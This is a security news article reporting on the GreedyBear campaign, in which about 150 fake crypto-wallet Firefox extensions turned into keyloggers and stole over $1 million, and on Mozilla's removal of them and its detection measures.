Analysts at Koi Security discovered the malicious GreedyBear campaign, which is active in the Mozilla add-ons store. 150 malicious Firefox extensions have stolen cryptocurrency worth over $1 million from users.
Fraudulent extensions disguised themselves as popular crypto wallet extensions of well-known platforms, including MetaMask, TronLink, Exodus, and Rabby Wallet. Initially, they were uploaded to the store without malicious code to pass inspections and remained inactive for some time to accumulate fake positive reviews.
At a later stage of the attack, the extension publishers removed the original branding and replaced it with new names and logos, as well as injected malware into the code designed to steal wallet data and users’ IP addresses (likely for tracking or targeting purposes).
The malicious code acted as a keylogger, intercepting input data from form fields and pop-up windows, and then sending it to the attackers’ server.
Experts from Koi Security have notified Mozilla developers about their findings, and the malicious extensions have now been removed from the Firefox add-ons store.
However, researchers report that in addition to Firefox extensions, this operation involves dozens of Russian-language sites with pirated software, which contribute to the distribution of 500 different malware executables, as well as a network of sites posing as official resources of Trezor, Jupiter Wallet, and fake hardware wallet repair services.
All these sites are linked to a single IP address (185.208.156[.]66), which acts as a command server for GreedyBear.
In these cases, various trojans, info-stealers (such as Lumma), or even ransomware can be used as the malicious payload.
The report also mentions that the analysis of this campaign revealed clear artifacts indicating that the attackers are using AI.
“This allows attackers to scale their operations faster and easier than ever before, diversify their payloads, and evade detection,” experts write.
Additionally, the company warned that the operators of GreedyBear are clearly considering the possibility of distributing malware through the Chrome Web Store as well. The fact is, researchers discovered a malicious Chrome extension called Filecoin Wallet, which used the same logic to steal data and was linked to the aforementioned IP address.
It is worth noting that in June 2025, Mozilla developers introduced a new system for early detection of add-ons related to cryptocurrency scams. It creates risk profiles for each wallet extension available in the store and automatically warns about risks if a specified threshold is reached.
These warnings should prompt people who review add-ons to take a closer look at specific extensions, to remove malware from the store before it is used to empty users’ wallets.